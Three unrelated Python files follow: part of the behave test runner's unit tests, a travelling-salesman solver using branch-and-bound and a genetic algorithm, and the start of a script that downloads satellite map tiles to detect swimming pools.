assert isinstance(warning, runner.ContextMaskWarning)
info = warning.args[0]
assert info.startswith("behave runner"), "%r doesn't start with 'behave runner'" % info
assert "'thing'" in info, "%r not in %r" % ("'thing'", info)
filename = __file__.rsplit(".", 1)[0]
if python_implementation() == "Jython":
filename = filename.replace("$py", ".py")
assert filename in info, "%r not in %r" % (filename, info)
def test_context_deletable(self):
eq_("thing" in self.context, False)
self.context.thing = "stuff"
eq_("thing" in self.context, True)
del self.context.thing
eq_("thing" in self.context, False)
@raises(AttributeError)
def test_context_deletable_raises(self):
# pylint: disable=protected-access
eq_("thing" in self.context, False)
self.context.thing = "stuff"
eq_("thing" in self.context, True)
self.context._push()
eq_("thing" in self.context, True)
del self.context.thing
class ExampleSteps(object):
text = None
table = None
@staticmethod
def step_passes(context): # pylint: disable=unused-argument
pass
@staticmethod
def step_fails(context): # pylint: disable=unused-argument
assert False, "XFAIL"
@classmethod
def step_with_text(cls, context):
assert context.text is not None, "REQUIRE: multi-line text"
cls.text = context.text
@classmethod
def step_with_table(cls, context):
assert context.table, "REQUIRE: table"
cls.table = context.table
@classmethod
def register_steps_with(cls, step_registry):
# pylint: disable=bad-whitespace
step_definitions = [
("step", "a step passes", cls.step_passes),
("step", "a step fails", cls.step_fails),
("step", "a step with text", cls.step_with_text),
("step", "a step with a table", cls.step_with_table),
]
for keyword, string, func in step_definitions:
step_registry.add_step_definition(keyword, string, func)
class TestContext_ExecuteSteps(unittest.TestCase):
"""
Test the behave.runner.Context.execute_steps() functionality.
"""
# pylint: disable=invalid-name, no-self-use
step_registry = None
def setUp(self):
if not self.step_registry:
# -- SETUP ONCE:
self.step_registry = StepRegistry()
ExampleSteps.register_steps_with(self.step_registry)
ExampleSteps.text = None
ExampleSteps.table = None
runner_ = Mock()
self.config = runner_.config = Mock()
runner_.config.verbose = False
runner_.config.stdout_capture = False
runner_.config.stderr_capture = False
runner_.config.log_capture = False
runner_.step_registry = self.step_registry
self.context = runner.Context(runner_)
runner_.context = self.context
self.context.feature = Mock()
self.context.feature.parser = parser.Parser()
self.context.runner = runner_
# self.context.text = None
# self.context.table = None
def test_execute_steps_with_simple_steps(self):
doc = u"""
Given a step passes
Then a step passes
""".lstrip()
with patch("behave.step_registry.registry", self.step_registry):
result = self.context.execute_steps(doc)
eq_(result, True)
def test_execute_steps_with_failing_step(self):
doc = u"""
Given a step passes
When a step fails
Then a step passes
""".lstrip()
with patch("behave.step_registry.registry", self.step_registry):
try:
result = self.context.execute_steps(doc)
except AssertionError as e:
ok_("FAILED SUB-STEP: When a step fails" in _text(e))
def test_execute_steps_with_undefined_step(self):
doc = u"""
Given a step passes
When a step is undefined
Then a step passes
""".lstrip()
with patch("behave.step_registry.registry", self.step_registry):
try:
result = self.context.execute_steps(doc)
except AssertionError as e:
ok_("UNDEFINED SUB-STEP: When a step is undefined" in _text(e))
def test_execute_steps_with_text(self):
doc = u'''
Given a step passes
When a step with text:
"""
Lorem ipsum
Ipsum lorem
"""
Then a step passes
'''.lstrip()
with patch("behave.step_registry.registry", self.step_registry):
result = self.context.execute_steps(doc)
expected_text = "Lorem ipsum\nIpsum lorem"
eq_(result, True)
eq_(expected_text, ExampleSteps.text)
def test_execute_steps_with_table(self):
doc = u"""
Given a step with a table:
| Name | Age |
| Alice | 12 |
| Bob | 23 |
Then a step passes
""".lstrip()
with patch("behave.step_registry.registry", self.step_registry):
# pylint: disable=bad-whitespace, bad-continuation
result = self.context.execute_steps(doc)
expected_table = Table([u"Name", u"Age"], 0, [
[u"Alice", u"12"],
[u"Bob", u"23"],
])
eq_(result, True)
eq_(expected_table, ExampleSteps.table)
def test_context_table_is_restored_after_execute_steps_without_table(self):
doc = u"""
Given a step passes
Then a step passes
""".lstrip()
with patch("behave.step_registry.registry", self.step_registry):
original_table = "<ORIGINAL_TABLE>"
self.context.table = original_table
self.context.execute_steps(doc)
eq_(self.context.table, original_table)
def test_context_table_is_restored_after_execute_steps_with_table(self):
doc = u"""
Given a step with a table:
| Name | Age |
| Alice | 12 |
| Bob | 23 |
Then a step passes
""".lstrip()
with patch("behave.step_registry.registry", self.step_registry):
original_table = "<ORIGINAL_TABLE>"
self.context.table = original_table
self.context.execute_steps(doc)
eq_(self.context.table, original_table)
def test_context_text_is_restored_after_execute_steps_without_text(self):
doc = u"""
Given a step passes
Then a step passes
""".lstrip()
with patch("behave.step_registry.registry", self.step_registry):
original_text = "<ORIGINAL_TEXT>"
self.context.text = original_text
self.context.execute_steps(doc)
eq_(self.context.text, original_text)
def test_context_text_is_restored_after_execute_steps_with_text(self):
doc = u'''
Given a step passes
When a step with text:
"""
Lorem ipsum
Ipsum lorem
"""
'''.lstrip()
with patch("behave.step_registry.registry", self.step_registry):
original_text = "<ORIGINAL_TEXT>"
self.context.text = original_text
self.context.execute_steps(doc)
eq_(self.context.text, original_text)
@raises(ValueError)
def test_execute_steps_should_fail_when_called_without_feature(self):
doc = u"""
Given a passes
Then a step passes
""".lstrip()
with patch("behave.step_registry.registry", self.step_registry):
self.context.feature = None
self.context.execute_steps(doc)
def create_mock_config():
config = Mock()
config.steps_dir = "steps"
config.environment_file = "environment.py"
return config
class TestRunner(object):
# pylint: disable=invalid-name, no-self-use
def test_load_hooks_execfiles_hook_file(self):
with patch("behave.runner.exec_file") as ef:
with patch("os.path.exists") as exists:
exists.return_value = True
base_dir = "fake/path"
hooks_path = os.path.join(base_dir, "environment.py")
r = runner.Runner(create_mock_config())
r.base_dir = base_dir
r.load_hooks()
exists.assert_called_with(hooks_path)
ef.assert_called_with(hooks_path, r.hooks)
def test_run_hook_runs_a_hook_that_exists(self):
config = Mock()
r = runner.Runner(config)
# XXX r.config = Mock()
r.config.stdout_capture = False
r.config.stderr_capture = False
r.config.dry_run = False
r.hooks["before_lunch"] = hook = Mock()
args = (runner.Context(Mock()), Mock(), Mock())
r.run_hook("before_lunch", *args)
hook.assert_called_with(*args)
def test_run_hook_does_not_runs_a_hook_that_exists_if_dry_run(self):
r = runner.Runner(None)
r.config = Mock()
r.config.dry_run = True
r.hooks["before_lunch"] = hook = Mock()
args = (runner.Context(Mock()), Mock(), Mock())
r.run_hook("before_lunch", *args)
assert len(hook.call_args_list) == 0
def test_setup_capture_creates_stringio_for_stdout(self):
r = runner.Runner(Mock())
r.config.stdout_capture = True
r.config.log_capture = False
r.context = Mock()
r.setup_capture()
assert r.capture_controller.stdout_capture is not None
assert isinstance(r.capture_controller.stdout_capture, StringIO)
def test_setup_capture_does_not_create_stringio_if_not_wanted(self):
r = runner.Runner(Mock())
r.config.stdout_capture = False
r.config.stderr_capture = False
r.config.log_capture = False
r.setup_capture()
assert r.capture_controller.stdout_capture is None
@patch("behave.capture.LoggingCapture")
def test_setup_capture_creates_memory_handler_for_logging(self, handler):
r = runner.Runner(Mock())
r.config.stdout_capture = False
r.config.log_capture = True
r.context = Mock()
r.setup_capture()
assert r.capture_controller.log_capture is not None
handler.assert_called_with(r.config)
r.capture_controller.log_capture.inveigle.assert_called_with()
def test_setup_capture_does_not_create_memory_handler_if_not_wanted(self):
r = runner.Runner(Mock())
r.config.stdout_capture = False
r.config.stderr_capture = False
r.config.log_capture = False
r.setup_capture()
assert r.capture_controller.log_capture is None
def test_start_stop_capture_switcheroos_sys_stdout(self):
old_stdout = sys.stdout
sys.stdout = new_stdout = Mock()
r = runner.Runner(Mock())
r.config.stdout_capture = True
r.config.log_capture = False
r.context = Mock()
r.setup_capture()
r.start_capture()
eq_(sys.stdout, r.capture_controller.stdout_capture)
r.stop_capture()
eq_(sys.stdout, new_stdout)
sys.stdout = old_stdout
def test_start_stop_capture_leaves_sys_stdout_alone_if_off(self):
r = runner.Runner(Mock())
r.config.stdout_capture = False
r.config.log_capture = False
old_stdout = sys.stdout
r.start_capture()
eq_(sys.stdout, old_stdout)
r.stop_capture()
eq_(sys.stdout, old_stdout)
def test_teardown_capture_removes_log_tap(self):
r = runner.Runner(Mock())
r.config.stdout_capture = False
r.config.log_capture = True
r.capture_controller.log_capture = Mock()
r.teardown_capture()
r.capture_controller.log_capture.abandon.assert_called_with()
def test_exec_file(self):
fn = tempfile.mktemp()
with open(fn, "w") as f:
f.write("spam = __file__\n")
g = {}
l = {}
runner.exec_file(fn, g, l)
assert "__file__" in l
# pylint: disable=too-many-format-args
assert "spam" in l, '"spam" variable not set in locals (%r)' % (g, l)
# pylint: enable=too-many-format-args
eq_(l["spam"], fn)
def test_run_returns_true_if_everything_passed(self):
r = runner.Runner(Mock())
r.setup_capture = Mock()
r.setup_paths = Mock()
r.run_with_paths = Mock()
r.run_with_paths.return_value = True
assert r.run()
def test_run_returns_false_if_anything_failed(self):
r = runner.Runner(Mock())
r.setup_capture = Mock()
r.setup_paths = Mock()
r.run_with_paths = Mock()
r.run_with_paths.return_value = False
assert not r.run()
class TestRunWithPaths(unittest.TestCase):
# pylint: disable=invalid-name, no-self-use
def setUp(self):
self.config = Mock()
self.config.reporters = []
self.config.logging_level = None
self.config.logging_filter = None
self.config.outputs = [Mock(), StreamOpener(stream=sys.stdout)]
self.config.format = ["plain", "progress"]
self.runner = runner.Runner(self.config)
self.load_hooks = self.runner.load_hooks = Mock()
self.load_step_definitions = self.runner.load_step_definitions = Mock()
self.run_hook = self.runner.run_hook = Mock()
self.run_step = self.runner.run_step = Mock()
self.feature_locations = self.runner.feature_locations = Mock()
self.calculate_summaries = self.runner.calculate_summaries = Mock()
self.formatter_class = patch("behave.formatter.pretty.PrettyFormatter")
formatter_class = self.formatter_class.start()
formatter_class.return_value = self.formatter = Mock()
def tearDown(self):
self.formatter_class.stop()
def test_loads_hooks_and_step_definitions(self):
self.feature_locations.return_value = []
self.runner.run_with_paths()
assert self.load_hooks.called
assert self.load_step_definitions.called
def test_runs_before_all_and_after_all_hooks(self):
# Make runner.feature_locations() and runner.run_hook() the same mock so
# we can make sure things happen in the right order.
self.runner.feature_locations = self.run_hook
self.runner.feature_locations.return_value = []
self.runner.context = Mock()
self.runner.run_with_paths()
eq_(self.run_hook.call_args_list, [
((), {}),
(("before_all", self.runner.context), {}),
(("after_all", self.runner.context), {}),
])
@patch("behave.parser.parse_file")
@patch("os.path.abspath")
def test_parses_feature_files_and_appends_to_feature_list(self, abspath,
parse_file):
feature_locations = ["one", "two", "three"]
feature = Mock()
feature.tags = []
feature.__iter__ = Mock(return_value=iter([]))
feature.run.return_value = False
self.runner.feature_locations.return_value = feature_locations
abspath.side_effect = lambda x: x.upper()
self.config.lang = "fritz"
self.config.format = ["plain"]
self.config.outputs = [StreamOpener(stream=sys.stdout)]
self.config.output.encoding = None
self.config.exclude = lambda s: False
self.config.junit = False
self.config.summary = False
parse_file.return_value = feature
self.runner.run_with_paths()
expected_parse_file_args = \
[((x.upper(),), {"language": "fritz"}) for x in feature_locations]
eq_(parse_file.call_args_list, expected_parse_file_args)
eq_(self.runner.features, [feature] * 3)
class FsMock(object):
def __init__(self, *paths):
self.base = os.path.abspath(".")
self.sep = os.path.sep
# This bit of gymnastics is to support Windows. We feed in a bunch of
# paths in places using FsMock that assume that POSIX-style paths
# work. This is faster than fixing all of those but at some point we
# should totally do it properly with os.path.join() and all that.
def full_split(path):
bits = []
while path:
path, bit = os.path.split(path)
bits.insert(0, bit)
return bits
paths = [os.path.join(self.base, *full_split(path)) for path in paths]
print(repr(paths))
self.paths = paths
self.files = set()
self.dirs = defaultdict(list)
separators = [sep for sep in (os.path.sep, os.path.altsep) if sep]
for path in paths:
if path[-1] in separators:
self.dirs[path[:-1]] = []
d, p = os.path.split(path[:-1])
while d and p:
self.dirs[d].append(p)
d, p = os.path.split(d)
else:
self.files.add(path)
d, f = os.path.split(path)
self.dirs[d].append(f)
self.calls = []
def listdir(self, dir):
# pylint: disable=W0622
# W0622 Redefining built-in dir
self.calls.append(("listdir", dir))
return self.dirs.get(dir, [])
def isfile(self, path):
self.calls.append(("isfile", path))
return path in self.files
def isdir(self, path):
self.calls.append(("isdir", path))
return path in self.dirs
def exists(self, path):
self.calls.append(("exists", path))
return path in self.dirs or path in self.files
def walk(self, path, locations=None):
if locations is None:
assert path in self.dirs, "%s not in %s" % (path, self.dirs)
locations = []
dirnames = []
filenames = []
for e in self.dirs[path]:
if os.path.join(path, e) in self.dirs:
dirnames.append(e)
self.walk(os.path.join(path, e), locations)
else:
filenames.append(e)
locations.append((path, dirnames, filenames))
return locations
# utilities that we need
# pylint: disable=no-self-use
def dirname(self, path, orig=os.path.dirname):
return orig(path)
def abspath(self, path, orig=os.path.abspath):
return orig(path)
def join(self, x, y, orig=os.path.join):
return orig(x, y)
def split(self, path, orig=os.path.split):
return orig(path)
def splitdrive(self, path, orig=os.path.splitdrive):
return orig(path)
class TestFeatureDirectory(object):
# pylint: disable=invalid-name, no-self-use
def test_default_path_no_steps(self):
config = create_mock_config()
config.paths = []
config.verbose = True
r = runner.Runner(config)
fs = FsMock()
# will look for a "features" directory and not find one
with patch("os.path", fs):
assert_raises(ConfigError, r.setup_paths)
ok_(("isdir", os.path.join(fs.base, "features", "steps")) in fs.calls)
def test_default_path_no_features(self):
config = create_mock_config()
config.paths = []
config.verbose = True
r = runner.Runner(config)
fs = FsMock("features/steps/")
with patch("os.path", fs):
with patch("os.walk", fs.walk):
assert_raises(ConfigError, r.setup_paths)
def test_default_path(self):
config = create_mock_config()
config.paths = []
config.verbose = True
r = runner.Runner(config)
fs = FsMock("features/steps/", "features/foo.feature")
with patch("os.path", fs):
with patch("os.walk", fs.walk):
with r.path_manager:
r.setup_paths()
eq_(r.base_dir, os.path.abspath("features"))
def test_supplied_feature_file(self):
config = create_mock_config()
config.paths = ["foo.feature"]
config.verbose = True
r = runner.Runner(config)
r.context = Mock()
fs = FsMock("steps/", "foo.feature")
with patch("os.path", fs):
with patch("os.walk", fs.walk):
with r.path_manager:
r.setup_paths()
ok_(("isdir", os.path.join(fs.base, "steps")) in fs.calls)
ok_(("isfile", os.path.join(fs.base, "foo.feature")) in fs.calls)
eq_(r.base_dir, fs.base)
def test_supplied_feature_file_no_steps(self):
config = create_mock_config()
config.paths = ["foo.feature"]
config.verbose = True
r = runner.Runner(config)
fs = FsMock("foo.feature")
with patch("os.path", fs):
with patch("os.walk", fs.walk):
with r.path_manager:
assert_raises(ConfigError, r.setup_paths)
def test_supplied_feature_directory(self):
config = create_mock_config()
config.paths = ["spam"]
config.verbose = True
r = runner.Runner(config)
fs = FsMock("spam/", "spam/steps/", "spam/foo.feature")
with patch("os.path", fs):
with patch("os.walk", fs.walk):
with r.path_manager:
r.setup_paths()
ok_(("isdir", os.path.join(fs.base, "spam", "steps")) in fs.calls)
eq_(r.base_dir, os.path.join(fs.base, "spam"))
def test_supplied_feature_directory_no_steps(self):
config = create_mock_config()
config.paths = ["spam"]
config.verbose = True
r = runner.Runner(config)
fs = FsMock("spam/", "spam/foo.feature")
with patch("os.path", fs):
with patch("os.walk", fs.walk):
assert_raises(ConfigError, r.setup_paths)
ok_(("isdir", os.path.join(fs.base, "spam", "steps")) in fs.calls)
def test_supplied_feature_directory_missing(self):
config = create_mock_config()
config.paths = ["spam"]
config.verbose = True
r = runner.Runner(config)
fs = FsMock()
with patch("os.path", fs):
with patch("os.walk", fs.walk):
assert_raises(ConfigError, r.setup_paths)
class TestFeatureDirectoryLayout2(object):
# pylint: disable=invalid-name, no-self-use
def test_default_path(self):
config = create_mock_config()
config.paths = []
config.verbose = True
r = runner.Runner(config)
fs = FsMock(
"features/",
"features/steps/",
"features/group1/",
"features/group1/foo.feature",
)
with patch("os.path", fs):
with patch("os.walk", fs.walk):
with r.path_manager:
r.setup_paths()
eq_(r.base_dir, os.path.abspath("features"))
def test_supplied_root_directory(self):
config = create_mock_config()
config.paths = ["features"]
config.verbose = True
r = runner.Runner(config)
fs = FsMock(
"features/",
"features/group1/",
"features/group1/foo.feature",
"features/steps/",
)
with patch("os.path", fs):
with patch("os.walk", fs.walk):
with r.path_manager:
r.setup_paths()
ok_(("isdir", os.path.join(fs.base, "features", "steps")) in fs.calls)
eq_(r.base_dir, os.path.join(fs.base, "features"))
def test_supplied_root_directory_no_steps(self):
config = create_mock_config()
config.paths = ["features"]
config.verbose = True
r = runner.Runner(config)
fs = FsMock(
"features/",
"features/group1/",
"features/group1/foo.feature",
)
with patch("os.path", fs):
with patch("os.walk", fs.walk):
with r.path_manager:
assert_raises(ConfigError, r.setup_paths)
ok_(("isdir", os.path.join(fs.base, "features", "steps")) in fs.calls)
eq_(r.base_dir, None)
def test_supplied_feature_file(self):
config = create_mock_config()
config.paths = ["features/group1/foo.feature"]
config.verbose = True
r = runner.Runner(config)
r.context = Mock()
fs = FsMock(
"features/",
"features/group1/",
"features/group1/foo.feature",
"features/steps/",
)
with patch("os.path", fs):
with patch("os.walk", fs.walk):
with r.path_manager:
r.setup_paths()
ok_(("isdir", os.path.join(fs.base, "features", "steps")) in fs.calls)
ok_(("isfile", os.path.join(fs.base, "features", "group1", "foo.feature")) in fs.calls)
eq_(r.base_dir, fs.join(fs.base, "features"))
def test_supplied_feature_file_no_steps(self):
config = create_mock_config()
config.paths = ["features/group1/foo.feature"]
config.verbose = True
r = runner.Runner(config)
fs = FsMock(
"features/",
"features/group1/",
"features/group1/foo.feature",
)
with patch("os.path", fs):
with patch("os.walk", fs.walk):
with r.path_manager:
assert_raises(ConfigError, r.setup_paths)
def test_supplied_feature_directory(self):
config = create_mock_config()
config.paths = ["features/group1"]
config.verbose = True
r = runner.Runner(config)
fs = FsMock(
"features/",
"features/group1/",
"features/group1/foo.feature",
"features/steps/",
)
with patch("os.path", fs):
with patch("os.walk", fs.walk):
with r.path_manager:
r.setup_paths()
ok_(("isdir", os.path.join(fs.base, "features", "steps")) in fs.calls)
eq_(r.base_dir, os.path.join(fs.base, "features"))
def test_supplied_feature_directory_no_steps(self):
config = create_mock_config()
config.paths = ["features/group1"]
config.verbose = True
r = runner.Runner(config)
fs = FsMock(
"features/",
"features/group1/",
"features/group1/foo.feature",
)
with patch("os.path", fs):
with patch("os.walk", fs.walk):
assert_raises(ConfigError, r.setup_paths)
ok_(("isdir", os.path.join(fs.base, "features", "steps")) in fs.calls)
| |
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
from math import sqrt
import random
import copy as copy
import sys
class TspBNB(object):
"""
The branch and bound TSP object, enabling the setting of positions in the
constructor, a method for plotting
"""
def __init__(self, dataX, dataY):
"""
Args:
dataX (array): A 1xN array of x-points.
dataY (array): A 1xN array of y-points.
"""
self.xy = np.array([dataX, dataY])
self.path = []
self.fopt = None
self.dist = self._distance_matrix()
def plot(self, solution = 0, distance = 0):
"""
Args:
solution (bool): Set to true if the XY points and solution are to
be plotted
distance (bool): Set to true if the distance matrix is to be
plotted
"""
if solution:
for ii in range(len(self.path) - 1):
plt.gca().plot([self.xy[0][self.path[ii]], self.xy[0][self.path[ii + 1]]],
[self.xy[1][self.path[ii]], self.xy[1][self.path[ii + 1]]], 'k')
plt.gca().plot(self.xy[0], self.xy[1],'ro', markersize=5)
for i in range(len(self.xy[0])):
plt.gca().annotate("#" + str(i), (self.xy[0][i],self.xy[1][i]))
plt.title(('Optimal solution to the TSP (black) with connected towns,\n'+
'(red) using the branch and bound method'))
if distance:
ax = plt.gca()
cax = ax.matshow(self.dist, interpolation='nearest')
plt.title('Distance matrix $\in\mathbb{R}^{NxN}$ from town i to town j')
plt.colorbar(cax)
def _distance_matrix(self):
"""
Generates and returns a distance matrix for the specified xy points.
"""
nelm = len(self.xy[0])
def dist(ii, jj):
return (sqrt((self.xy[0][ii] - self.xy[0][jj]) ** 2 +
(self.xy[1][ii] - self.xy[1][jj]) ** 2))
return np.array([np.array([dist(ii, jj) for jj in range(nelm)]) for ii in range(nelm)])
def __call__(self):
"""
Solves the traveling salesman problem using information set in the
constructor.
"""
sys.stdout.write('Starting BnB TSP solver... '),
nelm = len(self.xy[0])
minmax = np.zeros([nelm,2]);
for ii in range(nelm):
minmax[ii][0]=min(np.concatenate((self.dist[:ii, ii], self.dist[ii + 1:, ii])));
minmax[ii][1]=max(np.concatenate((self.dist[:ii, ii], self.dist[ii + 1:, ii])));
startx = [0]
bounds = self._boundy(startx, minmax)
path, fopt = self._branchandbound(startx, minmax, bounds[1]);
self.path = path
self.fopt = fopt
sys.stdout.write('Complete!\n')
sys.stdout.flush()
def _boundy(self, x, minmax):
nelm = len(self.xy[0])
bounds = np.array([0, 0])
for ii in range(len(x) - 1):
bounds = bounds + self.dist[x[ii]][x[ii + 1]]
nonVisitedPoints = [ii for ii in range(nelm) if not ii in x]
if nonVisitedPoints:
for ii in nonVisitedPoints:
bounds = bounds + minmax[ii][:]
else:
if len(x) <= nelm:
bounds = bounds + minmax[x[0]][:]
return bounds
def _branchy(self, x):
nelm = len(self.xy[0])
if len(x) == nelm:
possibleX = [x + [x[0]]]
else:
possibleX = []
for ii in [ii for ii in range(nelm) if not ii in x]:
possibleX.append(x + [ii])
return possibleX
def _branchandbound(self, x, minmax, fopt):
bounds = self._boundy(x, minmax)
if bounds[0] == bounds[1]:
if bounds[1] < fopt:
fopt = bounds[0]
else:
X = self._branchy(x)
B = []
for ii in range(len(X[:])):
B.append(self._boundy(X[ii][:], minmax).tolist())
for ii in [i[0] for i in sorted(enumerate(B), key=lambda x:x[1])]:
if B[ii][0] < fopt:
xNew, foptNew = self._branchandbound(X[ii][:], minmax, fopt)
if foptNew < fopt:
fopt = foptNew
x = xNew
return x, fopt
class TspGA(object):
def __init__(self, dataX, dataY, ):
"""
Args:
dataX (array): A 1xN array of x-points.
dataY (array): A 1xN array of y-points.
"""
self.xy = np.array([dataX, dataY])
self.populationSize = 100
self.iterationLim = 1000
self.solutionHistory = []
self.path = []
self.dist = self._distance_matrix()
def plot(self, points = 0, distance = 0, solution = 0, solutionHistory = 0):
"""
Args:
points (bool): Set to true if the XY points are to be plotted
"""
if solution:
for ii in range(len(self.path) - 1):
plt.gca().plot([self.xy[0][self.path[ii]], self.xy[0][self.path[ii + 1]]],
[self.xy[1][self.path[ii]], self.xy[1][self.path[ii + 1]]], 'k')
plt.gca().plot(self.xy[0], self.xy[1],'ro', markersize=5)
plt.xlabel('x'), plt.ylabel('y')
plt.title('Approximate solution to the TSP (black) with connected towns,\n'+
'(red) using the branch and bound method')
for i in range(len(self.xy[0])):
plt.gca().annotate("#" + str(i), (self.xy[0][i],self.xy[1][i]))
if distance:
plt.gca().matshow(self.dist)
plt.title('Distance matrix $\in\mathbb{R}^{NxN}$ from town i to town j')
if solutionHistory:
plt.gca().plot([ii for ii in range(self.iterationLim)], self.solutionHistory)
plt.title('Path distance (cost) as a function of the iterationnumber')
plt.ylabel('Cost'), plt.xlabel('Number of iterations')
plt.show()
def _distance_matrix(self):
"""
Generates a distance matrix for the specified xy points.
"""
def dist(ii, jj):
"""
Calculates a distance between two points at indices ii and jj in
the xy data matrix.
ARGS:
ii, jj (int): Indices
"""
return (sqrt((self.xy[0][ii] - self.xy[0][jj]) ** 2 + (self.xy[1][ii] - self.xy[1][jj]) ** 2))
return np.array([np.array([dist(ii, jj) for jj in range(len(self.xy[0]))]) for ii in range(len(self.xy[0]))])
def __call__(self):
# Generates a population
print('Starting GA solver...')
n = len(self.xy[0])
population = np.array([[ii for ii in range(n)] for jj in range(self.populationSize)])
for ii in range(1, self.populationSize):
random.shuffle(population[ii])
for iteration in range(self.iterationLim):
self.print_progress(iteration, self.iterationLim, 'Status:', 'complete.')
# Computes the total distance for each population member
populationDist = np.array([sum([self.dist[population[jj][ii - 1], population[jj][ii]] for ii in range(n)]) for jj in range(self.populationSize)])
randomizedIndices = [ii for ii in range(self.populationSize)]
random.shuffle(randomizedIndices)
path, minDistance = self._bestSolution(population)
self.path = path + [path[0]]
self.solutionHistory.append([minDistance])
newPopulation = []
for ii in range(self.populationSize // 4):
selectedPopulations = population[randomizedIndices[4 * ii : 4 * (ii + 1)]]
selectedDistances = populationDist[randomizedIndices[4 * ii : 4 * (ii + 1)]]
index = np.where(selectedDistances == selectedDistances.min())[0][0]
bestRoute = selectedPopulations[index]
breakPoints = [random.randint(0, n - 1), random.randint(0, n - 1)]
breakPoints.sort(key=int)
offspring = copy.copy(bestRoute)
flip = copy.copy(bestRoute).tolist() #Flip
flipSection = flip[breakPoints[0]:breakPoints[1]]
flipSection.reverse()
flip = flip[:breakPoints[0]] + flipSection + flip[breakPoints[1]:]
offspring = np.append([offspring], [flip], axis=0)
swap = copy.copy(bestRoute) #Swap
swap[breakPoints[0]], swap[breakPoints[1]] = swap[breakPoints[1]], swap[breakPoints[0]]
offspring = np.append(offspring, [swap], axis=0)
slide = copy.copy(bestRoute).tolist() #Slide
poppedElement = slide.pop(breakPoints[1])
slide.insert(breakPoints[0], poppedElement)
offspring = np.append(offspring, [slide], axis=0)
if newPopulation == []:
newPopulation = offspring
else:
newPopulation = np.append(newPopulation, offspring, axis=0)
population = newPopulation
def _bestSolution(self, population):
populationDist = np.array([sum([self.dist[population[jj][ii - 1], population[jj][ii]] for ii in range(len(population[0]))]) for jj in range(self.populationSize)])
index = np.where(populationDist == populationDist.min())
return population[index[0][0]].tolist(), populationDist.min()
def print_progress(self, iteration, total, prefix = '', suffix = '', decimals = 2, barLength = 30):
"""
Prints progress bar in terminal window
Args:
iteration - positive integer. The current iteration.
total - positive integer > iteration. The total number of iterations before completion.
prefix - string. Empty by default, specifies text before the progress bar.
suffix - string. Empty by default, specifies text after the progress bar.
decimals - positive integer. number of decimals in the percentage calculation.
barLength - positive, non-zero integer. Set to 30 # by default.
"""
filledLength = int(round(barLength * iteration / float(total)))
percents = round(100.00 * (iteration / float(total)), decimals)
bar = '#' * filledLength + '-' * (barLength - filledLength)
sys.stdout.write('%s [%s] %s%s %s\r' % (prefix, bar, percents, '%', suffix)),
sys.stdout.flush()
if iteration == total-1:
sys.stdout.write('Complete!' + ' ' * (barLength + 20) + '\n')
| |
import numpy as np
from urllib import urlretrieve
import ipdb
import matplotlib.pylab as pl
# Create your own satellite-image-only map on mapbox.
# I deleted the following one to prevent future charges,
# but the address should look something like this.
http_base='http://api.tiles.mapbox.com/v2/rkeisler.gh8kebdo/'
# Define the path for saving stuff.
basepath = '/Users/rkeisler/Desktop/satellite/'
imgpath = basepath+'img/'
labelpath = basepath+'label/'
def do_everything():
download_chunk('atx',19)
label_data('atx', size=2000)
get_colors(name='pool',ncolors=10, quick=False)
rf, colors = train_classifier(prefix='atx', nside=32, ds=4, color_thresh=30)
xtile, ytile, proba = predict_proba_all(rf, colors)
write_to_csv(xtile, ytile, proba, 'atx')
def latlong_to_xyz(lat_deg, lon_deg, zoom):
lat_rad = lat_deg*np.pi/180.
lon_rad = lon_deg*np.pi/180.
n = 2. ** zoom
xtile = n * ((lon_deg + 180) / 360)
ytile = n * (1 - (np.log(np.tan(lat_rad) + 1./np.cos(lat_rad)) / np.pi)) / 2.
return int(xtile), int(ytile), zoom
def xyz_to_latlong(x, y, zoom):
n = 2.0 ** zoom
lon_deg = x / n * 360.0 - 180.0
lat_rad = np.arctan(np.sinh(np.pi * (1 - 2 * y / n)))
lat_deg = np.degrees(lat_rad)
return (lat_deg, lon_deg)
def latlong_to_xyz(lat_deg, lon_deg, zoom):
lat_rad = lat_deg*np.pi/180.
lon_rad = lon_deg*np.pi/180.
n = 2. ** zoom
xtile = n * ((lon_deg + 180) / 360)
ytile = n * (1 - (np.log(np.tan(lat_rad) + 1./np.cos(lat_rad)) / np.pi)) / 2.
return int(xtile), int(ytile), zoom
def xyz_to_ZXY_string(x,y,z):
return '%i/%i/%i'%(z,x,y)+'.png'
def latlong_to_ZXY_string(lat_deg, lon_deg, zoom):
x,y,z = latlong_to_xyz(lat_deg, lon_deg, zoom)
return xyz_to_ZXY_string(x,y,z)
def latlong_rectange_to_xyz(lat1, lat2, lon1, lon2, zoom):
lat_min=np.min([lat1,lat2])
lat_max=np.max([lat1,lat2])
lon_min=np.min([lon1,lon2])
lon_max=np.max([lon1,lon2])
x_min, y_max, zoom = latlong_to_xyz(lat_min, lon_min, zoom)
x_max, y_min, zoom = latlong_to_xyz(lat_max, lon_max, zoom)
return x_min, x_max, y_min, y_max
def xyz_to_savename(x,y,z,prefix='tmp'):
return prefix+'_x%i_y%i_z%i'%(x,y,z)+'.png'
def xyz_from_filename(filename):
tmp=filename.split('/')[-1]
xtmp = int(tmp.split('x')[-1].split('_')[0].split('.')[0])
ytmp = int(tmp.split('y')[-1].split('_')[0].split('.')[0])
ztmp = int(tmp.split('z')[-1].split('_')[0].split('.')[0])
return xtmp, ytmp, ztmp
def hms_to_deg(hour, min, sec):
return np.sign(hour)*(np.abs(hour)+min/60.+sec/3600.)
def download_one(x,y,zoom,prefix='tmp'):
url=http_base+xyz_to_ZXY_string(x,y,zoom)+'.png'
savename=imgpath+xyz_to_savename(x,y,zoom,prefix=prefix)
urlretrieve(url, savename)
def download_chunk(name, zoom, download=True):
d=define_chunk(name)
download_rectangle(d['lat1'],d['lat2'],
d['lon1'],d['lon2'],
zoom, prefix=d['prefix'],
download=download)
def download_rectangle(lat1, lat2, lon1, lon2,
zoom, prefix='tmp', download=True):
x_min, x_max, y_min, y_max = latlong_rectange_to_xyz(lat1, lat2, lon1, lon2, zoom)
n_x = x_max-x_min
n_y = y_max-y_min
n_tiles = n_x*n_y
x_count=0
print 'Downloading X=(%i,%i), Y=(%i,%i)'%(x_min,x_max,y_min,y_max)
print 'n_x: %i'%n_x
print 'n_y: %i'%n_y
print 'That is %i tiles.'%n_tiles
if not(download): return
for x_tmp in range(x_min, x_max):
x_count+=1
print '%i/%i'%(x_count,n_x)
for y_tmp in range(y_min, y_max):
download_one(x_tmp,y_tmp,zoom,prefix=prefix)
def define_chunk(name):
atx=dict(prefix='atx',
lat1=hms_to_deg(30,20,21.95),
